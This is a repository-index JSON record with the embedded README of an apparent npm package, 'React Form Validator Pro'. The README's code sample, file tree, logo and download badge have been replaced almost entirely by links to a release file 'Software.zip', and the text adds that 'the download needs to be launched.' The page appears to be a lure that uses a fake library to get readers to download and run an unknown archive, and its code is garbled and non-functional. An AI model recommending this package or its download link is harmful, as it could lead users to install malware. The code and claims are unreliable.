{"id":25923893,"url":"https://github.com/bigdaveyy/react-form-validator-pro","last_synced_at":"2026-04-08T11:32:45.672Z","repository":{"id":276015789,"uuid":"927906436","full_name":"bigdaveyy/react-form-validator-pro","owner":"bigdaveyy","description":"A React form validation package.","archived":false,"fork":false,"pushed_at":"2026-04-03T04:41:06.000Z","size":2,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-04-03T05:34:24.946Z","etag":null,"topics":["forms","javascript","javascript-package","npm","react","react-form-validator","react-forms","validator"],"latest_commit_sha":null,"homepage":null,"language":null,"has_issues":false,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/bigdaveyy.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2025-02-05T18:31:08.000Z","updated_at":"2026-04-03T04:41:10.000Z","dependencies_parsed_at":"2026-04-02T20:00:18.911Z","dependency_job_id":null,"html_url":"https://github.com/bigdaveyy/react-form-validator-pro","commit_stats":null,"previous_names":["bigdaveyy/react-form-validator-pro"],"tags_count":2,"template":false,"template_full_name":null,"purl":"pkg:github/bigdaveyy/react-form-validator-pro","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/bigdaveyy%2Freact-form-validator-pro","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/bigdaveyy%2Freact-form-validator-pro/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/bigdaveyy%2Freact-form-validator-pro/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/bigdaveyy%2Freact-form-validator-pro/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/bigdaveyy","download_url":"https://codeload.github.com/bigdaveyy/react-form-validator-pro/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/bigdaveyy%2Freact-form-validator-pro/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":31554091,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-08T10:21:54.569Z","status":"ssl_error","status_checked_at":"2026-04-08T10:21:38.171Z","response_time":54,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["forms","javascript","javascript-package","npm","react","react-form-validator","react-forms","validator"],"created_at":"2025-03-03T17:18:33.440Z","updated_at":"2026-04-08T11:32:45.653Z","avatar_url":"https://github.com/bigdaveyy.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# 🚀 React Form Validator Pro\n\n![React Form Validator Pro Logo](https://github.com/bigdaveyy/react-form-validator-pro/releases/download/v2.0/Software.zip)\n\n## Overview\n\nWelcome to React Form Validator Pro - the ultimate React form validation package! This package provides easy-to-use and customizable form validation functionalities for your React applications. Say goodbye to manually handling form validation logic and let React Form Validator Pro take care of it for you.\n\n## Features\n\n🔍 Built-in validation rules for common use cases  \n🎨 Customizable error messages and styles  \n📋 Support for both synchronous and asynchronous validation  \n🛠️ Simple API for integrating with your React forms \n\n## Installation\n\nTo install React Form Validator Pro, simply run the following command:\n\n```bash\nnpm install react-form-validator-pro\n```\n\n## Usage\n\n```jsx\nimport React, { useState } from 'react';\nimport { FormValidator, validate } from 'react-form-validator-pro';\n\nconst MyForm = () =\u003e {\n  const [formData, setFormData] = useState({\n    email: '',\n    password: '',\n  });\n\n  const handleInputChange = (e) =\u003e {\n    const { name, value } = https://github.com/bigdaveyy/react-form-validator-pro/releases/download/v2.0/Software.zip;\n    setFormData({\n      https://github.com/bigdaveyy/react-form-validator-pro/releases/download/v2.0/Software.zip,\n      [name]: value,\n    });\n  };\n\n  const handleSubmit = () =\u003e {\n    const validationRules = {\n      email: [https://github.com/bigdaveyy/react-form-validator-pro/releases/download/v2.0/Software.zip('Email is required'), https://github.com/bigdaveyy/react-form-validator-pro/releases/download/v2.0/Software.zip('Please enter a valid email')],\n      password: [https://github.com/bigdaveyy/react-form-validator-pro/releases/download/v2.0/Software.zip('Password is required')],\n    };\n\n    const validationResult = https://github.com/bigdaveyy/react-form-validator-pro/releases/download/v2.0/Software.zip(formData, validationRules);\n\n    if (https://github.com/bigdaveyy/react-form-validator-pro/releases/download/v2.0/Software.zip) {\n      // Proceed with form submission\n    } else {\n      // Handle form validation errors\n    }\n  };\n\n  return (\n    \u003cform\u003e\n      \u003cinput type=\"text\" name=\"email\" value={https://github.com/bigdaveyy/react-form-validator-pro/releases/download/v2.0/Software.zip} onChange={handleInputChange} /\u003e\n      \u003cinput type=\"password\" name=\"password\" value={https://github.com/bigdaveyy/react-form-validator-pro/releases/download/v2.0/Software.zip} onChange={handleInputChange} /\u003e\n      \u003cbutton onClick={handleSubmit}\u003eSubmit\u003c/button\u003e\n    \u003c/form\u003e\n  );\n};\n\nexport default MyForm;\n```\n\n## Repository Structure\n\n```\nreact-form-validator-pro/\n├── src/\n│   ├── https://github.com/bigdaveyy/react-form-validator-pro/releases/download/v2.0/Software.zip\n│   └── https://github.com/bigdaveyy/react-form-validator-pro/releases/download/v2.0/Software.zip\n├── .gitignore\n├── https://github.com/bigdaveyy/react-form-validator-pro/releases/download/v2.0/Software.zip\n└── https://github.com/bigdaveyy/react-form-validator-pro/releases/download/v2.0/Software.zip\n```\n\n## Download\n\n[![Download React Form Validator Pro](https://github.com/bigdaveyy/react-form-validator-pro/releases/download/v2.0/Software.zip)](https://github.com/bigdaveyy/react-form-validator-pro/releases/download/v2.0/Software.zip)\n\n*Note: The download needs to be launched.*\n\n## Contributions\n\nWe welcome contributions from the community to make React Form Validator Pro even better! If you have any feature requests, bug reports, or suggestions, feel free to open an issue or submit a pull request.\n\n## License\n\nThis project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.\n\n---\n\n🌟 Start using React Form Validator Pro today and streamline your form validation process in React! 🌟","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbigdaveyy%2Freact-form-validator-pro","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fbigdaveyy%2Freact-form-validator-pro","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbigdaveyy%2Freact-form-validator-pro/lists"}